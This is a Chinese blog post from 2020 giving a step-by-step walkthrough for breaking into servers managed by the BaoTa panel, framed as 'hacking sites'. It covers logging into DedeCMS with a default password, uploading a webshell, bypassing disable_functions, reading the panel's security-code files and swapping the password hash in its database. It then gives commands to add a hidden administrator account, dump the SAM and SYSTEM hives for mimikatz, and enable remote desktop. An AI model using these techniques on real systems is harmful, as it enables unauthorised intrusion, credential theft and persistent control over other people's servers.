突破宝塔system命令的disable_function技巧分享

发表时间: 2020-05-25 11:58

大家平时日站的时候最讨厌看到什么?

云盾还是宝塔? 就我而言是宝塔(碰到的比较多),所以借用kelper大佬的思路写了一篇对宝塔的渗透实战

搭建集成环境

登录宝塔后台

选择apache控件,等待安装

选择php版本5.6

设置网站信息

记得选择php5.6的版本

安装dedecms

.user.ini文件

控制网站只允许访问的目录

open_basedir="C:/wwwroot/192.168.0.102/;C:/Windows/Temp/;C:/Temp/;C:/BtSoft/temp/session/"​.user.ini是lnmp文件,里面放的是你网站的文件夹路径地址。目的是防止跨目录访问和文件跨目录读取.配置 放在根目录 .user.iniopen_basedir=/项目路径/:/tmp/:/proc/     ​例:  open_basedir=/www/aaa/:/tmp/:/proc/ 

安装

getshell dedecms

利用默认密码登录后台

上传我们的大马

打开webshell

执行不了命令


宝塔禁用了函数

删除system函数使得可以执行系统命令

成功执行命令

whoami /priv

查看当前权限详细情况

特权信息----------------------​特权名                          描述                       状态  =============================== ========================== ======SeAssignPrimaryTokenPrivilege   替换一个进程级令牌         已禁用SeLockMemoryPrivilege           锁定内存页                 已启用SeIncreaseQuotaPrivilege        为进程调整内存配额         已禁用SeTcbPrivilege                  以操作系统方式执行         已启用SeSecurityPrivilege             管理审核和安全日志         已禁用SeTakeOwnershipPrivilege        取得文件或其他对象的所有权 已禁用SeLoadDriverPrivilege           加载和卸载设备驱动程序     已禁用SeSystemProfilePrivilege        配置文件系统性能           已启用SeSystemtimePrivilege           更改系统时间               已禁用SeProfileSingleProcessPrivilege 配置文件单一进程           已启用SeIncreaseBasePriorityPrivilege 提高计划优先级             已启用SeCreatePagefilePrivilege       创建一个页面文件           已启用SeCreatePermanentPrivilege      创建永久共享对象           已启用SeBackupPrivilege               备份文件和目录             已禁用SeRestorePrivilege              还原文件和目录             已禁用SeShutdownPrivilege             关闭系统                   已禁用SeDebugPrivilege                调试程序                   已启用SeAuditPrivilege                生成安全审核               已启用SeSystemEnvironmentPrivilege    修改固件环境值             已禁用SeChangeNotifyPrivilege         绕过遍历检查               已启用SeUndockPrivilege               从扩展坞上取下计算机       已禁用SeManageVolumePrivilege         执行卷维护任务             已禁用SeImpersonatePrivilege          身份验证后模拟客户端       已启用SeCreateGlobalPrivilege         创建全局对象               已启用SeIncreaseWorkingSetPrivilege   增加进程工作集             已启用SeTimeZonePrivilege             更改时区                   已启用SeCreateSymbolicLinkPrivilege   创建符号链接               已启用

我们对网站的配置文件进行搜集,看有没有可以利用的密码

方便用于后面的渗透

随机加密的,可利用可能不太大

渗透宝塔的思路

找到宝塔的安装目录,看里面的配置文件,有个配置文件是放着宝塔的安全校验码,也就是ip:8888/qweasdasd这种类型的校验码

还有一种思路,通过把存放宝塔密码的文件替换掉,存放宝塔密码在后缀db的文件下,宝塔的db文件里面为账号,密码(md5值加密,如果无法破解,可以自己加密md5值,之后替换db文件,实现密码重置)记得多翻翻宝塔的配置文件,config下

宝塔关键目录

宝塔面板关键目录解析23/www/4├── backup ---------------------------------------->宝塔面板的备份文件目录5   ├── database------------------------------------>宝塔面板的数据库备份目录6   ├── panel--------------------------------------->宝塔面板配置自动备份目录(6.9.32版本新添加)7      └── 2019-10-16------------------------------>宝塔面板配置自动备份的文件,默认是以年月日格式备份,数量为15天8   └── site---------------------------------------->宝塔面板站点备份目录9├── server------------------------------------------>宝塔面板服务目录(比较关键)10   ├── data---------------------------------------->mysql数据库服务的目录11├── dapao.err----------------------------------->数据库错误日志文件(比较重要,数据库启动不了可以将此日志文件打开,找到最新的日志发给DBA进行分析错误)12├── dapao.pid------------------------------->存放数据库pid的文件13   ├── nginx--------------------------------------->nginx的主目录14      ├── client_body_temp15      ├── conf------------------------------------>nginx的默认配置目录16      ├── fastcgi_temp17      ├── html18         ├── 50x.html19         └── index.html20      ├── logs-------------------------------------->nginx的日志目录21         ├── error.log22         └── nginx.pid23      ├── off24      ├── proxy_cache_dir25      ├── proxy_temp_dir26      ├── rpm.pl27      ├── sbin28         └── nginx-------------------------------->nginx的启动文件29      ├── scgi_temp30      ├── uwsgi_temp31      ├── version.pl32      └── waf33      ├── config.lua34      ├── init.lua35      └── waf.lua36   ├── panel----------------------------------------->面板文件目录(最为重要)37      ├── BTPanel38      ├── class39      ├── config40      ├── data41      ├── default.pl                  存放默认校验码的地方42      ├── init.sh43      ├── install----------------------------------->面板软件安装脚本路径44         ├── install_soft.sh45         ├── lib.sh46         ├── mysql.sh47         ├── nginx.sh48         ├── phpmyadmin.sh49         ├── php.sh50         ├── public.sh------------------------------>安装软件主脚本51         └── pureftpd.sh52      ├── license.txt53      ├── logs--------------------------------------->面板日志存放目录54         ├── access.log----------------------------->面板访问日志文件55         ├── certbot.log56         ├── error.log-------------------------------->面板错误日志文件57(面板打不开或者软件安装不了,可以打开这个文件将最新的日志信息发到宝塔论坛)58         ├── panel.pid59         ├── request60            └── 2019-10-16.json61         └── task.log62      ├── rewrite------------------------------------->伪静态存放目录63         ├── apache---------------------------------->apache默认的伪静态规则目录64            ├── dedecms.conf65            ├── default.conf66            ├── discuzx2.conf67            ├── discuzx3.conf68            ├── discuzx.conf69            ├── ecshop.conf70            ├── EmpireCMS.conf71            ├── list.txt72            ├── mvc.conf73            ├── phpcms.conf74            ├── phpwind.conf75            ├── thinkphp.conf76            ├── wordpress.conf77            └── zblog.conf78         └── nginx----------------------------------->nginx默认的伪静态规则存放目录79         ├── dabr.conf80         ├── dbshop.conf81         ├── dedecms.conf82         ├── default.conf83         ├── discuz.conf84         ├── discuzx2.conf85         ├── discuzx3.conf86         ├── discuzx.conf87         ├── drupal.conf88         ├── ecshop.conf89         ├── emlog.conf90         ├── EmpireCMS.conf91         ├── laravel5.conf92         ├── maccms.conf93         ├── mvc.conf94         ├── niushop.conf95         ├── phpcms.conf96         ├── phpwind.conf97         ├── sablog.conf98         ├── seacms.conf99         ├── shopex.conf100         ├── thinkphp.conf101         ├── typecho2.conf102         ├── typecho.conf103         ├── wordpress.conf104         ├── wp2.conf105         └── zblog.conf106      ├── runconfig.py107      ├── runserver.py108      ├── runserver.pyc109      ├── script----------------------------------------------->面板计划任务备份脚本目录110         ├── backup111         ├── backup.py112         ├── ftp.sh113         ├── GetOS.sh114         ├── install.sh115         ├── logsBackup116         ├── logsBackup.py117         └── rememory.sh118      ├── ssl-------------------------------------------------->面板证书目录119         ├── certificate.pem120         └── privateKey.pem121      ├── task.py122      ├── tmp123      ├── tools.py124      ├── tools.pyc125      └── vhost------------------------------------------------>站点配置文件目录126      ├── apache------------------------------------------->apache 站点配置文件目录127         ├── 0.default.conf128         └── dapao.com.conf129      ├── cert--------------------------------------------->站点证书目录130      ├── nginx-------------------------------------------->nginx站点配置文件目录131         ├── 0.default.conf132         ├── dapao.com.conf133         └── phpfpm_status.conf134      ├── rewrite----------------------------------------->站点重定向配置文件目录135         └── dapao.com.conf136      ├── template137         ├── apache138         └── nginx139         ├── anti.conf140         ├── error_page.conf141         ├── other.conf142         ├── proxy.conf143         ├── redirect.conf144         └── ssl.conf145      ├── tomcat------------------------------------------->tomcat站点配置文件目录146      └── wafconf147      ├── args148      ├── blockip149      ├── cookie150      ├── denycc151      ├── post152      ├── returnhtml153      ├── url154      ├── user-agent155      ├── whiteip156      └── whiteurl157   ├── php-------------------------------------------------------->php安装目录158      └── 54159   ├── phpmyadmin160   ├── pure-ftpd161├── wwwlogs-------------------------------------------------------->站点日志目录(当站点打不开或者出错,将最新错误日志发到论坛)162   ├── access.log163   ├── dapao.com.error.log164   ├── dapao.com.log165   ├── nginx_error.log166   └── waf167├── wwwroot-------------------------------------------------------->站点根目录168   └── dapao.com169   ├── 404.html170   └── index.html

Windows常用命令

whoami查看当前权限whoami /all 查当前用户在目标系统中的具体权限,这可能会成为你一上来的习惯性动作 ^_^query user 查当前机器中正在线的用户,注意管理员此时在不在hostname 查当前机器的机器名,知道当前机器是干啥的net user查看当前用户列表net user text查看用户具体信息net localgroup 查当前机器中所有的组名,了解不同组的职能,如,IT,HR,ADMIN,FILE...net localgroup "Administrators" 查指定组中的成员列表添加用户到管理员net user 用户名 密码 /addnet localgroup administrators 用户名 /add

webshell替换宝塔登录密码

下载出宝塔的登录存放的数据库

校验码的路径:

C:/BtSoft/panel/data/admin_path.plC:/BtSoft/panel/data/default.pl​//我们就可以组成网址http://192.168.0.102:8888/rNwgs4dA/

使用

下载下来,SQLiteStudio导入数据库进行查看

密码是md5加密是无法解

获取账号密码

我们替换数据的加密密码,移除数据库,将其此数据库上传

使用修改的密码登录成功


s

windows密码导出

reg save HKLM\SYSTEM Sys.hiv reg save HKLM\SAM Sam.hiv​导出文件Sys.hivSam.hiv文件然后mimikatz.exe 执行lsadump::sam m:Sam.hiv /system:Sys.hiv

windows远程访问控制

打开3389端口